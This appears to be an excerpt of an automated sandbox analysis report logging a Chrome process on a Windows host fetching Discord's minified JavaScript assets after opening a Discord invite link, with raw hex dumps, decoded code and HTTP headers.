                                                                                                                                                                                                                                                                                    Data Ascii: u.cj)([C.default],()=>({loginStatus:C.default.getLoginStatus(),mfaTicket:C.default.getMFATicket(),errors:C.default.getErrors(),mfaMethods:C.default.getMFAMethods()}));return(0,r.jsx)(k,{...e,...t})}},129293:function(e,t,n){n.d(t,{Z:function(){return r}});
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:48 UTC1369INData Raw: 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 74 2c 7b 76 61 6c 75 65 3a 6e 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 77 72 69 74 61 62 6c 65 3a 21 30 7d 29 3a 65 5b 74 5d 3d 6e 2c 65 7d 63 6c 61 73 73 20 68 20 65 78 74 65 6e 64 73 28 73 3d 6f 2e 50 75 72 65 43 6f 6d 70 6f 6e 65 6e 74 29 7b 72 65 6e 64 65 72 28 29 7b 6c 65 74 7b 63 6c 61 73 73 4e 61 6d 65 3a 65 7d 3d 74 68 69 73 2e 70 72 6f 70 73 3b 72 65 74 75 72 6e 28 30 2c 69 2e 6a 73 78 29 28 22 69 6e 70 75 74 22 2c 7b 72 65 66 3a 74 68 69 73 2e 73 65 74 43 6f 64 65 42 6c 6f 63 6b 52 65 66 2c 63 6c 61 73 73 4e 61 6d 65 3a 61 28 29 28 75 2e 69 6e 70 75 74 2c 65 29 2c 6d 61 78 4c 65 6e 67 74 68 3a 31 2c 76 61 6c 75 65 3a 6e 75 6c
                                                                                                                                                                                                                                                                                    Data Ascii: bject.defineProperty(e,t,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[t]=n,e}class h extends(s=o.PureComponent){render(){let{className:e}=this.props;return(0,i.jsx)("input",{ref:this.setCodeBlockRef,className:a()(u.input,e),maxLength:1,value:nul
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:48 UTC1369INData Raw: 2e 41 6c 69 67 6e 2e 43 45 4e 54 45 52 2c 6a 75 73 74 69 66 79 3a 63 2e 5a 2e 4a 75 73 74 69 66 79 2e 43 45 4e 54 45 52 2c 63 6c 61 73 73 4e 61 6d 65 3a 65 2c 63 68 69 6c 64 72 65 6e 3a 73 7d 29 7d 73 65 74 43 6f 64 65 42 6c 6f 63 6b 52 65 66 28 65 2c 74 29 7b 74 68 69 73 2e 5f 63 6f 64 65 42 6c 6f 63 6b 52 65 66 73 5b 65 5d 3d 74 7d 68 61 6e 64 6c 65 43 68 61 6e 67 65 28 65 2c 74 29 7b 74 68 69 73 2e 73 74 61 74 65 2e 63 6f 64 65 73 5b 65 5d 3d 74 3b 6c 65 74 20 6e 3d 74 68 69 73 2e 67 65 74 43 6f 64 65 4f 72 46 69 72 73 74 45 6d 70 74 79 49 6e 64 65 78 28 29 3b 69 66 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 6e 29 74 68 69 73 2e 73 75 62 6d 69 74 28 6e 29 3b 65 6c 73 65 7b 6c 65 74 20 65 3d 74 68 69 73 2e 5f 63 6f 64 65 42 6c 6f 63 6b 52 65
                                                                                                                                                                                                                                                                                    Data Ascii: .Align.CENTER,justify:c.Z.Justify.CENTER,className:e,children:s})}setCodeBlockRef(e,t){this._codeBlockRefs[e]=t}handleChange(e,t){this.state.codes[e]=t;let n=this.getCodeOrFirstEmptyIndex();if("string"==typeof n)this.submit(n);else{let e=this._codeBlockRe
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:48 UTC1369INData Raw: 69 63 61 74 65 64 28 29 7d 29 29 2c 6a 3d 6e 65 77 20 70 2e 5a 28 6e 29 2c 77 3d 6c 26 26 28 6e 75 6c 6c 3d 3d 72 3f 76 6f 69 64 20 30 3a 72 2e 69 64 29 3d 3d 3d 6a 2e 69 64 2c 53 3d 6e 2e 74 6f 6b 65 6e 53 74 61 74 75 73 3d 3d 3d 4e 2e 71 2e 49 4e 56 41 4c 49 44 2c 41 3d 6f 7c 7c 6a 2e 69 73 50 6f 6d 65 6c 6f 28 29 3f 6e 75 6c 6c 3a 22 23 22 2e 63 6f 6e 63 61 74 28 6a 2e 64 69 73 63 72 69 6d 69 6e 61 74 6f 72 29 2c 62 3d 6e 75 6c 6c 3b 72 65 74 75 72 6e 20 77 3f 62 3d 28 30 2c 69 2e 6a 73 78 29 28 75 2e 54 65 78 74 2c 7b 76 61 72 69 61 6e 74 3a 22 74 65 78 74 2d 73 6d 2f 73 65 6d 69 62 6f 6c 64 22 2c 63 6c 61 73 73 4e 61 6d 65 3a 6b 2e 68 69 6e 74 54 65 78 74 2c 63 6f 6c 6f 72 3a 22 74 65 78 74 2d 70 6f 73 69 74 69 76 65 22 2c 63 68 69 6c 64 72 65 6e 3a
                                                                                                                                                                                                                                                                                    Data Ascii: icated()})),j=new p.Z(n),w=l&&(null==r?void 0:r.id)===j.id,S=n.tokenStatus===N.q.INVALID,A=o||j.isPomelo()?null:"#".concat(j.discriminator),b=null;return w?b=(0,i.jsx)(u.Text,{variant:"text-sm/semibold",className:k.hintText,color:"text-positive",children:
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:48 UTC1369INData Raw: 63 74 69 6f 6e 4d 65 6e 75 2c 6f 6e 43 6c 69 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 28 30 2c 68 2e 76 71 29 28 65 2c 65 3d 3e 7b 6c 65 74 7b 6f 6e 53 65 6c 65 63 74 3a 74 7d 3d 65 3b 72 65 74 75 72 6e 28 30 2c 69 2e 6a 73 78 29 28 75 2e 4d 65 6e 75 2c 7b 22 61 72 69 61 2d 6c 61 62 65 6c 22 3a 45 2e 69 6e 74 6c 2e 73 74 72 69 6e 67 28 45 2e 74 5b 22 34 31 71 69 44 51 22 5d 29 2c 6e 61 76 49 64 3a 22 6d 61 6e 61 67 65 2d 6d 75 6c 74 69 2d 61 63 63 6f 75 6e 74 22 2c 6f 6e 43 6c 6f 73 65 3a 68 2e 5a 79 2c 6f 6e 53 65 6c 65 63 74 3a 74 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 69 2e 6a 73 78 29 28 75 2e 4d 65 6e 75 49 74 65 6d 2c 7b 69 64 3a 22 72 65 6d 6f 76 65 2d 61 63 63 6f 75 6e 74 22 2c 6c 61 62 65 6c 3a 45 2e 69 6e 74 6c 2e 73 74 72 69 6e 67 28 45 2e
                                                                                                                                                                                                                                                                                    Data Ascii: ctionMenu,onClick:function(e){(0,h.vq)(e,e=>{let{onSelect:t}=e;return(0,i.jsx)(u.Menu,{"aria-label":E.intl.string(E.t["41qiDQ"]),navId:"manage-multi-account",onClose:h.Zy,onSelect:t,children:(0,i.jsx)(u.MenuItem,{id:"remove-account",label:E.intl.string(E.
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:48 UTC1369INData Raw: 74 73 57 69 74 68 28 22 2b 22 29 3b 66 75 6e 63 74 69 6f 6e 20 6c 28 65 2c 74 29 7b 72 65 74 75 72 6e 22 70 68 6f 6e 65 22 3d 3d 3d 65 3f 21 6f 28 74 29 3a 22 65 6d 61 69 6c 22 21 3d 3d 65 26 26 21 28 74 2e 6c 65 6e 67 74 68 3c 33 29 26 26 69 2e 74 65 73 74 28 74 29 7d 7d 2c 37 36 36 36 35 30 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 6e 2e 64 28 74 2c 7b 5a 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 68 7d 7d 29 2c 6e 28 34 37 31 32 30 29 3b 76 61 72 20 73 3d 6e 28 32 30 30 36 35 31 29 2c 72 3d 6e 28 31 39 32 33 37 39 29 2c 69 3d 6e 28 31 32 30 33 35 36 29 2c 6f 3d 6e 2e 6e 28 69 29 2c 6c 3d 6e 28 31 30 30 36 32 31 29 2c 61 3d 6e 28 34 38 31 30 36 30 29 2c 63 3d 6e 28 31 34 34 31 31 34 29 2c 75 3d 6e 28 33 31 37 31 37 35 29 2c 64 3d
                                                                                                                                                                                                                                                                                    Data Ascii: tsWith("+");function l(e,t){return"phone"===e?!o(t):"email"!==e&&!(t.length<3)&&i.test(t)}},766650:function(e,t,n){n.d(t,{Z:function(){return h}}),n(47120);var s=n(200651),r=n(192379),i=n(120356),o=n.n(i),l=n(100621),a=n(481060),c=n(144114),u=n(317175),d=


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    106192.168.2.549826162.159.137.2324437288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:48 UTC862OUTGET /assets/f587337433e36ce917bd.js HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: discord.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                    Referer: https://discord.com/invite/BNXa5rYFXM
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                    Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:48 UTC962INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:48 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                                                    Content-Length: 13681
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    CF-Ray: 8e73d0f4eb5841ad-EWR
                                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: https://discord.com
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                                    ETag: "59bb723decfa5a2c2b359ed4c541e33b"
                                                                                                                                                                                                                                                                                    Last-Modified: Fri, 22 Nov 2024 06:05:42 GMT
                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                    Permissions-Policy: interest-cohort=()
                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z9NeAuLGVVbXMDbTRtbWk1F5DGbJ14lMVZtkGO9w3jRc1pXQw0qcrZDHoi3IkGE6%2BbLkjz23Tm2vdpcCSHDWkDqAjo3kQeABLU0ZnjvPsFYviPABw27MyzWx%2Fv%2BW"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:48 UTC1369INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 36 30 36 37 33 22 5d 2c 7b 32 39 32 38 32 34 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 2e 65 78 70 6f 72 74 73 3d 22 2f 61 73 73 65 74 73 2f 30 30 66 65 38 61 36 35 35 37 65 32 30 34 65 62 39 35 30 33 2e 73 76 67 22 7d 2c 32 33 31 32 33 39 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 76 61 72 20 6c 3d 6e 28 39 39 30 35 34 37 29 2c 72 3d 6e 28 32 38 33 36 39 33 29 2c 69 3d 6e 28 35 37 30 31 34 30 29 2c 61 3d 6e 28 35 37 33 32 36 31 29 2c 75 3d 6e 28 39 38 31 36 33 31 29 3b 65 2e 5a 3d 7b 73 69 67 6e
                                                                                                                                                                                                                                                                                    Data Ascii: "use strict";(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["60673"],{292824:function(t){t.exports="/assets/00fe8a6557e204eb9503.svg"},231239:function(t,e,n){var l=n(990547),r=n(283693),i=n(570140),a=n(573261),u=n(981631);e.Z={sign
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:48 UTC1369INData Raw: 69 66 79 43 6f 64 65 28 74 2c 65 2c 6e 29 7b 69 66 28 6e 75 6c 6c 21 3d 74 29 74 72 79 7b 76 61 72 20 72 3b 6c 65 74 20 6f 3d 61 77 61 69 74 20 61 2e 5a 2e 70 6f 73 74 28 7b 75 72 6c 3a 75 2e 41 4e 4d 2e 48 55 42 5f 45 4d 41 49 4c 5f 56 45 52 49 46 59 5f 43 4f 44 45 2c 62 6f 64 79 3a 7b 63 6f 64 65 3a 74 2c 67 75 69 6c 64 5f 69 64 3a 65 2c 65 6d 61 69 6c 3a 6e 7d 2c 74 72 61 63 6b 65 64 41 63 74 69 6f 6e 44 61 74 61 3a 7b 65 76 65 6e 74 3a 6c 2e 4e 65 74 77 6f 72 6b 41 63 74 69 6f 6e 4e 61 6d 65 73 2e 48 55 42 5f 45 4d 41 49 4c 5f 56 45 52 49 46 59 7d 2c 72 65 6a 65 63 74 57 69 74 68 45 72 72 6f 72 3a 21 31 7d 29 2c 73 3d 6e 75 6c 6c 3d 3d 3d 28 72 3d 6f 2e 62 6f 64 79 2e 67 75 69 6c 64 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 72 3f 76 6f 69 64 20 30 3a 72 2e
                                                                                                                                                                                                                                                                                    Data Ascii: ifyCode(t,e,n){if(null!=t)try{var r;let o=await a.Z.post({url:u.ANM.HUB_EMAIL_VERIFY_CODE,body:{code:t,guild_id:e,email:n},trackedActionData:{event:l.NetworkActionNames.HUB_EMAIL_VERIFY},rejectWithError:!1}),s=null===(r=o.body.guild)||void 0===r?void 0:r.
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:48 UTC1369INData Raw: 6e 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 6c 2e 6a 73 78 29 28 75 2e 56 6a 2c 7b 67 75 69 6c 64 3a 65 2c 73 69 7a 65 3a 75 2e 56 6a 2e 53 69 7a 65 73 2e 4c 41 52 47 45 52 2c 61 6e 69 6d 61 74 65 3a 21 30 7d 29 7d 29 3b 65 6c 73 65 20 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 3b 65 2e 5a 3d 74 3d 3e 7b 76 61 72 20 65 3b 6c 65 74 20 6e 2c 72 2c 6f 2c 7b 69 6e 76 69 74 65 3a 73 2c 64 69 73 61 62 6c 65 55 73 65 72 3a 55 3d 21 31 2c 65 72 72 6f 72 3a 76 2c 66 6c 61 74 41 63 74 69 76 69 74 79 43 6f 75 6e 74 3a 4c 3d 21 31 2c 69 73 52 65 67 69 73 74 65 72 3a 4d 3d 21 31 7d 3d 74 2c 7b 63 75 72 72 65 6e 74 55 73 65 72 3a 68 2c 6d 75 6c 74 69 41 63 63 6f 75 6e 74 73 3a 4f 7d 3d 28 30 2c 69 2e 63 6a 29 28 5b 64 2e 5a 2c 4e 2e 64 65 66 61 75 6c 74 5d 2c 28 29 3d 3e 28 7b
                                                                                                                                                                                                                                                                                    Data Ascii: n,children:(0,l.jsx)(u.Vj,{guild:e,size:u.Vj.Sizes.LARGER,animate:!0})});else return null};e.Z=t=>{var e;let n,r,o,{invite:s,disableUser:U=!1,error:v,flatActivityCount:L=!1,isRegister:M=!1}=t,{currentUser:h,multiAccounts:O}=(0,i.cj)([d.Z,N.default],()=>({
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:48 UTC1369INData Raw: 53 2e 67 75 69 6c 64 43 6f 6e 74 61 69 6e 65 72 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 6c 2e 6a 73 78 29 28 75 2e 56 6a 2c 7b 67 75 69 6c 64 3a 52 2c 73 69 7a 65 3a 75 2e 56 6a 2e 53 69 7a 65 73 2e 53 4d 41 4c 4c 7d 29 2c 28 30 2c 6c 2e 6a 73 78 29 28 61 2e 54 65 78 74 2c 7b 74 61 67 3a 22 73 70 61 6e 22 2c 76 61 72 69 61 6e 74 3a 22 74 65 78 74 2d 6c 67 2f 6e 6f 72 6d 61 6c 22 2c 63 6f 6c 6f 72 3a 22 68 65 61 64 65 72 2d 70 72 69 6d 61 72 79 22 2c 63 6c 61 73 73 4e 61 6d 65 3a 53 2e 61 70 70 47 75 69 6c 64 4e 61 6d 65 2c 63 68 69 6c 64 72 65 6e 3a 52 2e 6e 61 6d 65 7d 29 5d 7d 29 5d 7d 29 29 3b 65 6c 73 65 20 69 66 28 6e 75 6c 6c 21 3d 79 29 7b 69 66 28 6e 75 6c 6c 3d 3d 44 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 6e 6f 20 69 6e 76 69 74 65 72 20 69
                                                                                                                                                                                                                                                                                    Data Ascii: S.guildContainer,children:[(0,l.jsx)(u.Vj,{guild:R,size:u.Vj.Sizes.SMALL}),(0,l.jsx)(a.Text,{tag:"span",variant:"text-lg/normal",color:"header-primary",className:S.appGuildName,children:R.name})]})]}));else if(null!=y){if(null==D)throw Error("no inviter i
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:48 UTC1369INData Raw: 65 5f 70 72 65 73 65 6e 63 65 5f 63 6f 75 6e 74 2c 74 6f 74 61 6c 3a 73 2e 61 70 70 72 6f 78 69 6d 61 74 65 5f 6d 65 6d 62 65 72 5f 63 6f 75 6e 74 2c 66 6c 61 74 3a 4c 7d 29 2c 4f 2e 6c 65 6e 67 74 68 3e 31 3f 28 30 2c 6c 2e 6a 73 78 29 28 75 2e 6a 51 2c 7b 75 73 65 72 3a 68 7d 29 3a 6e 75 6c 6c 5d 7d 29 7d 7d 2c 38 35 37 34 35 38 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 6e 2e 64 28 65 2c 7b 4d 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 7d 7d 29 3b 76 61 72 20 6c 3d 6e 28 32 30 30 36 35 31 29 3b 69 66 28 6e 28 31 39 32 33 37 39 29 2c 31 32 36 33 33 3d 3d 6e 2e 6a 29 76 61 72 20 72 3d 6e 28 35 31 32 39 36 39 29 3b 76 61 72 20 69 3d 6e 28 38 36 30 39 31 31 29 2c 61 3d 6e 28 39 38 31 36 33 31 29 2c 75 3d 6e 28 31 38 38 37 38 35 29
                                                                                                                                                                                                                                                                                    Data Ascii: e_presence_count,total:s.approximate_member_count,flat:L}),O.length>1?(0,l.jsx)(u.jQ,{user:h}):null]})}},857458:function(t,e,n){n.d(e,{M:function(){return o}});var l=n(200651);if(n(192379),12633==n.j)var r=n(512969);var i=n(860911),a=n(981631),u=n(188785)
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:48 UTC1369INData Raw: 37 33 30 31 35 36 38 39 32 32 36 22 7d 2c 34 38 30 33 38 37 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 6e 2e 64 28 65 2c 7b 48 4a 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 5f 7d 2c 5a 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 70 7d 2c 79 44 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 45 7d 7d 29 3b 76 61 72 20 6c 3d 6e 28 32 31 33 39 31 39 29 2c 72 3d 6e 28 35 34 34 38 39 31 29 2c 69 3d 6e 28 35 37 30 31 34 30 29 2c 61 3d 6e 28 38 39 33 37 37 36 29 2c 75 3d 6e 28 37 31 30 38 34 35 29 2c 6f 3d 6e 28 33 31 34 38 39 37 29 2c 73 3d 6e 28 37 32 36 37 34 35 29 2c 63 3d 6e 28 39 38 31 36 33 31 29 3b 6c 65 74 20 64 3d 6e 65 77 20 75 2e 5a 28 22 4d 75 6c 74 69 41 63 63 6f 75 6e 74 41 63 74 69 6f 6e 43 72 65 61
                                                                                                                                                                                                                                                                                    Data Ascii: 73015689226"},480387:function(t,e,n){n.d(e,{HJ:function(){return _},Zd:function(){return p},yD:function(){return E}});var l=n(213919),r=n(544891),i=n(570140),a=n(893776),u=n(710845),o=n(314897),s=n(726745),c=n(981631);let d=new u.Z("MultiAccountActionCrea
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:48 UTC1369INData Raw: 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 7d 7d 29 3b 76 61 72 20 6c 3d 6e 28 31 39 32 33 37 39 29 2c 72 3d 6e 28 34 34 32 38 33 37 29 2c 69 3d 6e 28 35 37 30 31 34 30 29 2c 61 3d 6e 28 34 38 30 33 38 37 29 2c 75 3d 6e 28 37 32 36 37 34 35 29 3b 66 75 6e 63 74 69 6f 6e 20 6f 28 29 7b 6c 65 74 20 74 3d 28 30 2c 72 2e 63 6a 29 28 5b 75 2e 5a 5d 2c 28 29 3d 3e 28 7b 69 73 4c 6f 61 64 69 6e 67 3a 75 2e 5a 2e 67 65 74 49 73 56 61 6c 69 64 61 74 69 6e 67 55 73 65 72 73 28 29 2c 6d 75 6c 74 69 41 63 63 6f 75 6e 74 55 73 65 72 73 3a 75 2e 5a 2e 67 65 74 55 73 65 72 73 28 29 7d 29 29 3b 72 65 74 75 72 6e 20 6c 2e 75 73 65 45 66 66 65 63 74 28 28 29 3d 3e 7b 69 2e 5a 2e 77 61 69 74 28 28 29 3d 3e 7b 61 2e 48 4a 28 29 7d 29 7d 2c 5b 5d 29 2c 74 7d 7d 2c 39
                                                                                                                                                                                                                                                                                    Data Ascii: nction(){return o}});var l=n(192379),r=n(442837),i=n(570140),a=n(480387),u=n(726745);function o(){let t=(0,r.cj)([u.Z],()=>({isLoading:u.Z.getIsValidatingUsers(),multiAccountUsers:u.Z.getUsers()}));return l.useEffect(()=>{i.Z.wait(()=>{a.HJ()})},[]),t}},9
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:48 UTC1369INData Raw: 2c 65 2c 6e 29 7b 72 65 74 75 72 6e 20 65 20 69 6e 20 74 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 65 2c 7b 76 61 6c 75 65 3a 6e 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 77 72 69 74 61 62 6c 65 3a 21 30 7d 29 3a 74 5b 65 5d 3d 6e 2c 74 7d 6c 65 74 20 73 3d 28 30 2c 75 2e 4b 34 29 28 29 3b 66 75 6e 63 74 69 6f 6e 20 63 28 74 29 7b 76 61 72 20 65 3b 6c 65 74 7b 63 6f 75 6e 74 72 79 43 6f 64 65 3a 6e 7d 3d 74 3b 69 66 28 6e 75 6c 6c 21 3d 6e 29 73 3d 6e 75 6c 6c 21 3d 3d 28 65 3d 28 30 2c 75 2e 5a 7a 29 28 6e 29 29 26 26 76 6f 69 64 20 30 21 3d 3d 65 3f 65 3a 28 30 2c 75 2e 4b 34 29 28 29 7d 63 6c 61 73 73 20 64 20 65 78 74 65 6e 64 73 28 72 3d 69 2e 5a 50 2e 44 65 76 69 63
                                                                                                                                                                                                                                                                                    Data Ascii: ,e,n){return e in t?Object.defineProperty(t,e,{value:n,enumerable:!0,configurable:!0,writable:!0}):t[e]=n,t}let s=(0,u.K4)();function c(t){var e;let{countryCode:n}=t;if(null!=n)s=null!==(e=(0,u.Zz)(n))&&void 0!==e?e:(0,u.K4)()}class d extends(r=i.ZP.Devic
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:48 UTC1369INData Raw: 46 5f 53 54 41 52 54 45 44 3d 22 6e 75 66 5f 73 74 61 72 74 65 64 22 2c 5f 2e 41 47 45 5f 47 41 54 45 3d 22 61 67 65 5f 67 61 74 65 22 2c 5f 2e 4e 55 46 5f 43 4f 4d 50 4c 45 54 45 3d 22 6e 75 66 5f 63 6f 6d 70 6c 65 74 65 22 2c 5f 2e 48 55 42 5f 43 4f 4e 4e 45 43 54 49 4f 4e 3d 22 68 75 62 5f 63 6f 6e 6e 65 63 74 69 6f 6e 22 7d 2c 33 39 30 38 38 35 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 76 61 72 20 6c 3d 6e 28 31 35 37 32 39 29 2c 72 3d 6e 28 38 37 37 31 32 34 29 2c 69 3d 6e 28 37 33 31 39 36 35 29 2c 61 3d 6e 28 34 33 33 35 31 37 29 2c 75 3d 6e 28 37 31 30 38 34 35 29 2c 6f 3d 6e 28 36 32 36 31 33 35 29 2c 73 3d 6e 28 36 33 30 37 32 34 29 2c 63 3d 6e 28 39 38 31 36 33 31 29 3b 6c 65 74 20 64 3d 22 55 73 65 72 46 6c 6f 77 41 6e 61 6c 79 74 69
                                                                                                                                                                                                                                                                                    Data Ascii: F_STARTED="nuf_started",_.AGE_GATE="age_gate",_.NUF_COMPLETE="nuf_complete",_.HUB_CONNECTION="hub_connection"},390885:function(t,e,n){var l=n(15729),r=n(877124),i=n(731965),a=n(433517),u=n(710845),o=n(626135),s=n(630724),c=n(981631);let d="UserFlowAnalyti
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:49 UTC1360INData Raw: 73 74 61 6d 70 3a 6f 2e 63 75 72 72 65 6e 74 54 69 6d 65 73 74 61 6d 70 2c 63 75 72 72 65 6e 74 53 74 65 70 3a 65 2c 63 75 72 72 65 6e 74 54 69 6d 65 73 74 61 6d 70 3a 6e 65 77 20 44 61 74 65 2c 65 6e 64 65 64 3a 6e 7d 7d 2c 63 75 72 72 65 6e 74 46 6c 6f 77 3a 6c 7d 29 7d 29 7d 70 2e 73 75 62 73 63 72 69 62 65 28 74 3d 3e 6e 75 6c 6c 21 3d 74 2e 63 75 72 72 65 6e 74 46 6c 6f 77 3f 74 2e 66 6c 6f 77 73 5b 74 2e 63 75 72 72 65 6e 74 46 6c 6f 77 5d 3a 76 6f 69 64 20 30 2c 74 3d 3e 7b 76 61 72 20 65 3b 69 66 28 6e 75 6c 6c 21 3d 74 29 7b 69 66 28 21 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 74 2e 74 79 70 65 3d 3d 3d 73 2e 4d 4b 2e 55 4e 4b 4e 4f 57 4e 29 72 65 74 75 72 6e 3b 6c 65 74 20 65 3d 22 22 2e 63 6f 6e 63 61 74 28 5f 2c 22 2d 22 29 2e 63 6f 6e 63
                                                                                                                                                                                                                                                                                    Data Ascii: stamp:o.currentTimestamp,currentStep:e,currentTimestamp:new Date,ended:n}},currentFlow:l})})}p.subscribe(t=>null!=t.currentFlow?t.flows[t.currentFlow]:void 0,t=>{var e;if(null!=t){if(!function(t){if(t.type===s.MK.UNKNOWN)return;let e="".concat(_,"-").conc


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    107192.168.2.549829162.159.137.2324437288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:48 UTC862OUTGET /assets/9390b4ecf309e4a58642.js HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: discord.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                    Referer: https://discord.com/invite/BNXa5rYFXM
